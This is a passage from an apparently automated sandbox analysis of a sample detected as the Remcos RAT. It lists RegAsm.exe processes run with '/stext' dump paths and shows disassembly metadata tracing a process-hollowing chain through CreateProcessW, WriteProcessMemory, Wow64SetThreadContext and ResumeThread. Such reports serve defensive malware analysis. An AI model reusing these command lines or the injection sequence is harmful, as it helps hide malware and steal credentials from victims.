                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.911284833.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:13
                                        Start time:11:34:45
                                        Start date:09/09/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu"
                                        Imagebase:0x910000
                                        File size:64'704 bytes
                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:14
                                        Start time:11:34:45
                                        Start date:09/09/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kvsjjdtlyhiliuyshkqzizcqbm"
                                        Imagebase:0x910000
                                        File size:64'704 bytes
                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:15
                                        Start time:11:34:45
                                        Start date:09/09/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uxxbkweempbqtbmwyvcbtlxzcbqib"
                                        Imagebase:0x910000
                                        File size:64'704 bytes
                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Executed Functions

                                          Function 001AD006 Relevance: .0, Instructions: 47COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.397970865.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ad000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2a33d848474eba099247b6107057bde7999030feb5fd59034bc6305422b72632
                                          • Instruction ID: 620a1b81620de26ae6f9b0772d6937e631e7b85368d7a322f3eec13d15b8bace
                                          • Opcode Fuzzy Hash: 2a33d848474eba099247b6107057bde7999030feb5fd59034bc6305422b72632
                                          • Instruction Fuzzy Hash: 3F018C6100D3C09FD7128B259D94762BFA4EF53624F1985CBE8858F1A3C2685C45CB72
                                          Function 001AD01D Relevance: .0, Instructions: 45COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.397970865.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ad000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c954b7f594843731643fad38a002b38c1352b82bc6af080216937760f30dd43b
                                          • Instruction ID: ba196816cb939a223c39cf0e9ef57baf0c7c35a12a65c02fb8e1990c67ce0a71
                                          • Opcode Fuzzy Hash: c954b7f594843731643fad38a002b38c1352b82bc6af080216937760f30dd43b
                                          • Instruction Fuzzy Hash: 0101F774104740EEE7248E25DD8476BBBD8EF427A4F28C515FC4A0F582C3799941CAB1

                                          Execution Graph

                                          Execution Coverage:11.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:58.7%
                                          Total number of Nodes:46
                                          Total number of Limit Nodes:2
                                          execution_graph 4336 214b38 4337 214b5f 4336->4337 4340 214c88 4337->4340 4341 214cb2 4340->4341 4342 214c74 4341->4342 4345 214d40 4341->4345 4361 214d50 4341->4361 4346 214d83 4345->4346 4377 211724 4346->4377 4348 214f4c 4349 211730 Wow64SetThreadContext 4348->4349 4350 21504b 4348->4350 4349->4350 4351 21176c WriteProcessMemory 4350->4351 4355 215374 4351->4355 4352 215613 4353 21176c WriteProcessMemory 4352->4353 4354 215664 4353->4354 4356 211778 Wow64SetThreadContext 4354->4356 4358 215767 4354->4358 4355->4352 4357 21176c WriteProcessMemory 4355->4357 4356->4358 4357->4355 4359 211790 ResumeThread 4358->4359 4360 215819 4359->4360 4360->4341 4362 214d83 4361->4362 4363 211724 CreateProcessW 4362->4363 4364 214f4c 4363->4364 4366 21504b 4364->4366 4392 211730 4364->4392 4381 21176c 4366->4381 4368 215613 4369 21176c WriteProcessMemory 4368->4369 4370 215664 4369->4370 4374 215767 4370->4374 4385 211778 4370->4385 4371 215374 4371->4368 4373 21176c WriteProcessMemory 4371->4373 4373->4371 4389 211790 4374->4389 4378 215928 CreateProcessW 4377->4378 4380 215b1c 4378->4380 4380->4380 4382 215f90 WriteProcessMemory 4381->4382 4384 216070 4382->4384 4384->4371 4386 215c60 Wow64SetThreadContext 4385->4386 4388 215d1c 4386->4388 4388->4374 4390 2160d0 ResumeThread 4389->4390 4391 215819 4390->4391 4391->4341 4393 215c60 Wow64SetThreadContext 4392->4393 4395 215d1c 4393->4395 4395->4366

                                          Executed Functions

                                          Function 00214D50 Relevance: .7, Instructions: 658COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 252 214d50-214d81 253 214d83 252->253 254 214d88-214ebe 252->254 253->254 259 214ec0 254->259 260 214ec5-214efa 254->260 259->260 262 214f27-214f6c call 211724 260->262 263 214efc-214f26 260->263 267 214f95-214fbb 262->267 268 214f6e-214f8a 262->268 263->262 271 214fc2-215004 267->271 272 214fbd 267->272 268->267 276 215006 271->276 277 21500b-215037 271->277 272->271 276->277 279 215039-21506b call 211730 277->279 280 215098-2150c9 call 21173c 277->280 287 215094-215096 279->287 288 21506d-215089 279->288 285 2150f2-2150fc 280->285 286 2150cb-2150e7 280->286 289 215103-215126 285->289 290 2150fe 285->290 286->285 287->285 288->287 292 215128 289->292 293 21512d-215171 call 211748 289->293 290->289 292->293 299 215173-21518f 293->299 300 21519a-2151a3 293->300 299->300 301 2151a5-2151cd call 211754 300->301 302 2151cf-2151d1 300->302 304 2151d7-2151eb 301->304 302->304 307 215214-21521e 304->307 308 2151ed-215209 304->308 310 215220 307->310 311 215225-215249 307->311 308->307 310->311 314 215250-2152a2 call 211760 311->314 315 21524b 311->315 320 2152a4-2152b8 314->320 321 2152ba-2152bc 314->321 315->314 322 2152c2-2152d6 320->322 321->322 323 215313-21532d 322->323 324 2152d8-215312 call 211760 322->324 325 215356-215394 call 21176c 323->325 326 21532f-21534b 323->326 324->323 332 215396-2153b2 325->332 333 2153bd-2153c7 325->333 326->325 332->333 334 2153c9 333->334 335 2153ce-2153de 333->335 334->335 337 2153e0 335->337 338 2153e5-21540d 335->338 337->338 342 215414-215423 338->342 343 21540f 338->343 344 2155ee-21560d 342->344 343->342 345 215613-21563a 344->345 346 215428-215436 344->346 350 215641-215684 call 21176c 345->350 351 21563c 345->351 347 215438 346->347 348 21543d-215464 346->348 347->348 354 215466 348->354 355 21546b-215492 348->355 357 215686-2156a2 350->357 358 2156ad-2156b7 350->358 351->350 354->355 360 215494 355->360 361 215499-2154cd 355->361 357->358 362 2156b9 358->362 363 2156be-2156eb 358->363 360->361 369 2154d3-2154e1 361->369 370 2155b9-2155c6 361->370 362->363 367 2156f8-215704 363->367 368 2156ed-2156f7 363->368 372 215706 367->372 373 21570b-21571b 367->373 368->367 374 2154e3 369->374 375 2154e8-2154ef 369->375 376 2155c8 370->376 377 2155cd-2155e1 370->377 372->373 380 215722-215753 373->380 381 21571d 373->381 374->375 382 2154f1 375->382 383 2154f6-21553e 375->383 376->377 378 2155e3 377->378 379 2155e8 377->379 378->379 379->344 386 215755-215762 call 211778 380->386 387 2157b4-2157e5 call 211784 380->387 381->380 382->383 391 215540 383->391 392 215545-21556a call 21176c 383->392 394 215767-215787 386->394 396 2157e7-215803 387->396 397 21580e-215814 call 211790 387->397 391->392 400 21556f-21558f 392->400 398 2157b0-2157b2 394->398 399 215789-2157a5 394->399 396->397 405 215819-215839 397->405 398->397 399->398 403 215591-2155ad 400->403 404 2155b8 400->404 403->404 404->370 407 215862-215905 405->407 408 21583b-215857 405->408 408->407
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: ContextMemoryProcessThreadWow64Write
                                          • String ID:
                                          • API String ID: 3696009080-0
                                          • Opcode ID: 97f63a99c6953d4701f7079def81ad26ce0e2c881f4318d1f662496b069bc83e
                                          • Instruction ID: d71e57b065ba37e0a8fcfe190f4fc803b428cf971940f33419d4f601e7577ed2
                                          • Opcode Fuzzy Hash: 97f63a99c6953d4701f7079def81ad26ce0e2c881f4318d1f662496b069bc83e
                                          • Instruction Fuzzy Hash: E762DD74A11228CFEB65DF25C885BEDBBB2AF98300F5081EA950DA7291DB345EC5CF50
                                          Function 00214D40 Relevance: .5, Instructions: 522COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 418 214d40-214d81 419 214d83 418->419 420 214d88-214ebe 418->420 419->420 425 214ec0 420->425 426 214ec5-214efa 420->426 425->426 428 214f27-214f6c call 211724 426->428 429 214efc-214f26 426->429 433 214f95-214fbb 428->433 434 214f6e-214f8a 428->434 429->428 437 214fc2-215004 433->437 438 214fbd 433->438 434->433 442 215006 437->442 443 21500b-215037 437->443 438->437 442->443 445 215039-21506b call 211730 443->445 446 215098-2150c9 call 21173c 443->446 453 215094-215096 445->453 454 21506d-215089 445->454 451 2150f2-2150fc 446->451 452 2150cb-2150e7 446->452 455 215103-215126 451->455 456 2150fe 451->456 452->451 453->451 454->453 458 215128 455->458 459 21512d-215171 call 211748 455->459 456->455 458->459 465 215173-21518f 459->465 466 21519a-2151a3 459->466 465->466 467 2151a5-2151cd call 211754 466->467 468 2151cf-2151d1 466->468 470 2151d7-2151eb 467->470 468->470 473 215214-21521e 470->473 474 2151ed-215209 470->474 476 215220 473->476 477 215225-215249 473->477 474->473 476->477 480 215250-2152a2 call 211760 477->480 481 21524b 477->481 486 2152a4-2152b8 480->486 487 2152ba-2152bc 480->487 481->480 488 2152c2-2152d6 486->488 487->488 489 215313-21532d 488->489 490 2152d8-215312 call 211760 488->490 491 215356-215394 call 21176c 489->491 492 21532f-21534b 489->492 490->489 498 215396-2153b2 491->498 499 2153bd-2153c7 491->499 492->491 498->499 500 2153c9 499->500 501 2153ce-2153de 499->501 500->501 503 2153e0 501->503 504 2153e5-21540d 501->504 503->504 508 215414-215423 504->508 509 21540f 504->509 510 2155ee-21560d 508->510 509->508 511 215613-21563a 510->511 512 215428-215436 510->512 516 215641-215684 call 21176c 511->516 517 21563c 511->517 513 215438 512->513 514 21543d-215464 512->514 513->514 520 215466 514->520 521 21546b-215492 514->521 523 215686-2156a2 516->523 524 2156ad-2156b7 516->524 517->516 520->521 526 215494 521->526 527 215499-2154cd 521->527 523->524 528 2156b9 524->528 529 2156be-2156eb 524->529 526->527 535 2154d3-2154e1 527->535 536 2155b9-2155c6 527->536 528->529 533 2156f8-215704 529->533 534 2156ed-2156f7 529->534 538 215706 533->538 539 21570b-21571b 533->539 534->533 540 2154e3 535->540 541 2154e8-2154ef 535->541 542 2155c8 536->542 543 2155cd-2155e1 536->543 538->539 546 215722-215753 539->546 547 21571d 539->547 540->541 548 2154f1 541->548 549 2154f6-21553e 541->549 542->543 544 2155e3 543->544 545 2155e8 543->545 544->545 545->510 552 215755-215762 call 211778 546->552 553 2157b4-2157e5 call 211784 546->553 547->546 548->549 557 215540 549->557 558 215545-21556a call 21176c 549->558 560 215767-215787 552->560 562 2157e7-215803 553->562 563 21580e-215814 call 211790 553->563 557->558 566 21556f-21558f 558->566 564 2157b0-2157b2 560->564 565 215789-2157a5 560->565 562->563 571 215819-215839 563->571 564->563 565->564 569 215591-2155ad 566->569 570 2155b8 566->570 569->570 570->536 573 215862-215905 571->573 574 21583b-215857 571->574 574->573
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 017e30c08340afe6085a6537a4c02a1179e47f2f2b391ab18650b6731ac47a27
                                          • Instruction ID: 799da4fb46a20f7090ccf2b8930e130bff39d4c98083db385741b6bc782d76d1
                                          • Opcode Fuzzy Hash: 017e30c08340afe6085a6537a4c02a1179e47f2f2b391ab18650b6731ac47a27
                                          • Instruction Fuzzy Hash: 1E32EE74A112288FEB64DF25C885BEDBBB2AF99300F5081EAD50DA7291DB345EC5CF40
                                          Function 006C203C Relevance: 6.3, Strings: 4, Instructions: 1315COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 6c203c-6c203f 1 6c2045-6c204d 0->1 2 6c2041-6c2043 0->2 3 6c204f-6c2055 1->3 4 6c2065-6c2069 1->4 2->1 7 6c2059-6c2063 3->7 8 6c2057 3->8 5 6c206f-6c2073 4->5 6 6c2194-6c219e 4->6 9 6c2075-6c2086 5->9 10 6c20b3 5->10 11 6c21ac-6c21b2 6->11 12 6c21a0-6c21a9 6->12 7->4 8->4 20 6c21ec-6c223b 9->20 21 6c208c-6c2091 9->21 15 6c20b5-6c20b7 10->15 13 6c21b8-6c21c4 11->13 14 6c21b4-6c21b6 11->14 18 6c21c6-6c21e9 13->18 14->18 15->6 19 6c20bd-6c20c1 15->19 19->6 23 6c20c7-6c20cb 19->23 34 6c243e-6c244d 20->34 35 6c2241-6c2246 20->35 24 6c20a9-6c20b1 21->24 25 6c2093-6c2099 21->25 23->6 27 6c20d1-6c20f7 23->27 24->15 28 6c209d-6c20a7 25->28 29 6c209b 25->29 27->6 42 6c20fd-6c2101 27->42 28->24 29->24 37 6c225e-6c2262 35->37 38 6c2248-6c224e 35->38 43 6c2268-6c226a 37->43 44 6c23e7-6c23f1 37->44 40 6c2250 38->40 41 6c2252-6c225c 38->41 40->37 41->37 46 6c2124 42->46 47 6c2103-6c210c 42->47 48 6c226c-6c2278 43->48 49 6c227a 43->49 50 6c23fd-6c2403 44->50 51 6c23f3-6c23fa 44->51 56 6c2127-6c2134 46->56 53 6c210e-6c2111 47->53 54 6c2113-6c2120 47->54 55 6c227c-6c227e 48->55 49->55 57 6c2409-6c2415 50->57 58 6c2405-6c2407 50->58 59 6c2122 53->59 54->59 55->44 60 6c2284-6c22a3 55->60 63 6c213a-6c2191 56->63 61 6c2417-6c243b 57->61 58->61 59->56 70 6c22a5-6c22b1 60->70 71 6c22b3 60->71 72 6c22b5-6c22b7 70->72 71->72 72->44 73 6c22bd-6c22c1 72->73 73->44 74 6c22c7-6c22cb 73->74 75 6c22cd-6c22dc 74->75 76 6c22de 74->76 77 6c22e0-6c22e2 75->77 76->77 77->44 78 6c22e8-6c22ec 77->78 78->44 79 6c22f2-6c2311 78->79 82 6c2329-6c2334 79->82 83 6c2313-6c2319 79->83 84 6c2336-6c2339 82->84 85 6c2343-6c235f 82->85 86 6c231d-6c231f 83->86 87 6c231b 83->87 84->85 88 6c237c-6c2386 85->88 89 6c2361-6c2374 85->89 86->82 87->82 90 6c2388 88->90 91 6c238a-6c23d8 88->91 89->88 92 6c23dd-6c23e4 90->92 91->92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393659857.00000000006C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6c0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: L4#p$L4#p$L4#p$d=H
                                          • API String ID: 0-1230055800
                                          • Opcode ID: e95a89bad26cac6bb6eac68fcd054356d138a463df7443fbe2045e31609d0fa0
                                          • Instruction ID: 11a0746980c3179ab3876cd67c6b2fe73191a243788d2dfd91296c763c244f50
                                          • Opcode Fuzzy Hash: e95a89bad26cac6bb6eac68fcd054356d138a463df7443fbe2045e31609d0fa0
                                          • Instruction Fuzzy Hash: B0B1F131B00246EBDB159F64C860BBE7BA2EF85311F18846EEE059B391DB75CD42C791
                                          Function 006C0BB5 Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 99 6c0bb5-6c0bb8 100 6c0bbe-6c0bc6 99->100 101 6c0bba-6c0bbc 99->101 102 6c0bde-6c0be2 100->102 103 6c0bc8-6c0bce 100->103 101->100 106 6c0be8-6c0bec 102->106 107 6c0d43-6c0d4d 102->107 104 6c0bd0 103->104 105 6c0bd2-6c0bdc 103->105 104->102 105->102 110 6c0bee-6c0bfd 106->110 111 6c0bff 106->111 108 6c0d4f-6c0d58 107->108 109 6c0d5b-6c0d61 107->109 114 6c0d67-6c0d73 109->114 115 6c0d63-6c0d65 109->115 112 6c0c01-6c0c03 110->112 111->112 112->107 116 6c0c09-6c0c29 112->116 117 6c0d75-6c0d93 114->117 115->117 123 6c0c48 116->123 124 6c0c2b-6c0c46 116->124 125 6c0c4a-6c0c4c 123->125 124->125 125->107 127 6c0c52-6c0c54 125->127 128 6c0c64 127->128 129 6c0c56-6c0c62 127->129 130 6c0c66-6c0c68 128->130 129->130 130->107 132 6c0c6e-6c0c8e 130->132 135 6c0ca6-6c0caa 132->135 136 6c0c90-6c0c96 132->136 139 6c0cac-6c0cb2 135->139 140 6c0cc4-6c0cc8 135->140 137 6c0c98 136->137 138 6c0c9a-6c0c9c 136->138 137->135 138->135 141 6c0cb4 139->141 142 6c0cb6-6c0cc2 139->142 143 6c0ccf-6c0cd1 140->143 141->140 142->140 145 6c0ce9-6c0d40 143->145 146 6c0cd3-6c0cd9 143->146 147 6c0cdd-6c0cdf 146->147 148 6c0cdb 146->148 147->145 148->145
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393659857.00000000006C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6c0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: l;H$l;H
                                          • API String ID: 0-4251726270
                                          • Opcode ID: 1ed4976eca4aeca47246e7d4cd9ac3e86be2e7607b04f0162848fece8257a159
                                          • Instruction ID: dd2fc28d723fac1a22bb6b808bf5b80601082ee8e15341ee9d79fc18ac69fe1a
                                          • Opcode Fuzzy Hash: 1ed4976eca4aeca47246e7d4cd9ac3e86be2e7607b04f0162848fece8257a159
                                          • Instruction Fuzzy Hash: 6A411375704302DBFB285BA48410BBAB393EF90311B24897ED81ADB391EB76DD42C761
                                          Function 00211724 Relevance: 1.7, APIs: 1, Instructions: 239processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 150 211724-2159b3 152 2159b5-2159c7 150->152 153 2159ca-2159d8 150->153 152->153 154 2159da-2159ec 153->154 155 2159ef-215a2b 153->155 154->155 156 215a2d-215a3c 155->156 157 215a3f-215b1a CreateProcessW 155->157 156->157 161 215b23-215bec 157->161 162 215b1c-215b22 157->162 171 215c22-215c2d 161->171 172 215bee-215c17 161->172 162->161 176 215c2e 171->176 172->171 176->176
                                          APIs
                                          • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00215B07
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 92afc36bdb7ebae76cad0ab000938478d8c21aa1e602b14596e4ef37b02bd539
                                          • Instruction ID: 977fbb5daff8525793f8d8437b41dce86967db4bc43dc3ec277e26d5a51087e7
                                          • Opcode Fuzzy Hash: 92afc36bdb7ebae76cad0ab000938478d8c21aa1e602b14596e4ef37b02bd539
                                          • Instruction Fuzzy Hash: 0581CF74D0022DDFDB24CFA5C880BDDBBF1AB59304F1494AAE549B7210DB749A85CF94
                                          Function 00215926 Relevance: 1.7, APIs: 1, Instructions: 237processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 177 215926-2159b3 178 2159b5-2159c7 177->178 179 2159ca-2159d8 177->179 178->179 180 2159da-2159ec 179->180 181 2159ef-215a2b 179->181 180->181 182 215a2d-215a3c 181->182 183 215a3f-215b1a CreateProcessW 181->183 182->183 187 215b23-215bec 183->187 188 215b1c-215b22 183->188 197 215c22-215c2d 187->197 198 215bee-215c17 187->198 188->187 202 215c2e 197->202 198->197 202->202
                                          APIs
                                          • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00215B07
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: e7eaa6524d2693b3fb0453a7d2f764ba97bae082927207d13ee8c4a3ad302e5e
                                          • Instruction ID: 396fd3d75ae1abcc486a2ff35c38d722375661c891c512a9ef6cee25da6047eb
                                          • Opcode Fuzzy Hash: e7eaa6524d2693b3fb0453a7d2f764ba97bae082927207d13ee8c4a3ad302e5e
                                          • Instruction Fuzzy Hash: D681CE74D0022DCFDB25CFA5C880BEDBBF1AB59304F1490AAE549B7210DB749A89CF94
                                          Function 00215F89 Relevance: 1.6, APIs: 1, Instructions: 114injectionCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 203 215f89-215ff7 204 215ff9-21600b 203->204 205 21600e-21606e WriteProcessMemory 203->205 204->205 206 216070-216076 205->206 207 216077-2160b5 205->207 206->207
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0021605E
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: e88be9e160ff72a7d858bb76aaba88c8aebdd383a53fbebebc91320d8417d3fd
                                          • Instruction ID: 2958f077d7f01b6e8d3623477269a5943937f08ea41d90768e26d01cabfc33db
                                          • Opcode Fuzzy Hash: e88be9e160ff72a7d858bb76aaba88c8aebdd383a53fbebebc91320d8417d3fd
                                          • Instruction Fuzzy Hash: C24199B5D102599FCF10CFA9D984ADEFBF1BB59310F24902AE818B7210C375AA95CF64
                                          Function 0021176C Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 210 21176c-215ff7 212 215ff9-21600b 210->212 213 21600e-21606e WriteProcessMemory 210->213 212->213 214 216070-216076 213->214 215 216077-2160b5 213->215 214->215
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0021605E
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 608de63e775cccffcdf0b128611aee775c5f5a6f5dccf9d2d832a30fa94c9e09
                                          • Instruction ID: bc19be3dd154e8bf6ef480193ed431c015ac7ca7c651125f9b163486298eee66
                                          • Opcode Fuzzy Hash: 608de63e775cccffcdf0b128611aee775c5f5a6f5dccf9d2d832a30fa94c9e09
                                          • Instruction Fuzzy Hash: 614178B5D10258DFCB10CFA9D984ADEFBF1BB59310F24902AE818B7210D375AA55CB64
                                          Function 00215C59 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 234 215c59-215cbc 235 215cd3-215d1a Wow64SetThreadContext 234->235 236 215cbe-215cd0 234->236 237 215d23-215d5b 235->237 238 215d1c-215d22 235->238 236->235 238->237
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00215D0A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: a6f367236ea728c60f1eae796280da747103a458fdaa00643a0b3121dd22d17d
                                          • Instruction ID: 7f5c2de2bc9ca2435880ef332f27dff4249f6ccd79617b70fec95582f3f08fbd
                                          • Opcode Fuzzy Hash: a6f367236ea728c60f1eae796280da747103a458fdaa00643a0b3121dd22d17d
                                          • Instruction Fuzzy Hash: 1331CBB5D11258DFCB10CFA9E884ADEFBF0AB49314F24806AE414B7350C3786A85CF54
                                          Function 00211730 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 218 211730-215cbc 220 215cd3-215d1a Wow64SetThreadContext 218->220 221 215cbe-215cd0 218->221 222 215d23-215d5b 220->222 223 215d1c-215d22 220->223 221->220 223->222
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00215D0A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 77fca1270aee52e78a6d6f0ba9daf92542fdafcef133881d4a5c282e8bbeff21
                                          • Instruction ID: 5e36f2d41bcea53c8ddbd99d2b5ef06d7da1cdb852abd6a23e25ebf4aa2144aa
                                          • Opcode Fuzzy Hash: 77fca1270aee52e78a6d6f0ba9daf92542fdafcef133881d4a5c282e8bbeff21
                                          • Instruction Fuzzy Hash: E0318BB5D11258DFCB10CFA9E984ADEFBF1AB49314F24906AE414B7310D378AA45CFA4
                                          Function 00211778 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 226 211778-215cbc 228 215cd3-215d1a Wow64SetThreadContext 226->228 229 215cbe-215cd0 226->229 230 215d23-215d5b 228->230 231 215d1c-215d22 228->231 229->228 231->230
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00215D0A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: dccdcabf8e0c80c0579797105574e0b3b3ebfa4137d471326695c0c81c5f74a3
                                          • Instruction ID: 3731ef61a4c0e87058585bf71c644bc23e08073ed2cd93877c95d3cb3036dd6b
                                          • Opcode Fuzzy Hash: dccdcabf8e0c80c0579797105574e0b3b3ebfa4137d471326695c0c81c5f74a3
                                          • Instruction Fuzzy Hash: 9331ABB5D11258DFCB10CFAAD984ADEFBF1AB49314F24806AE414B7310D378AA45CFA4
                                          Function 002160C8 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 241 2160c8-216156 ResumeThread 242 216158-21615e 241->242 243 21615f-21618d 241->243 242->243
                                          APIs
                                          • ResumeThread.KERNELBASE(?), ref: 00216146
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
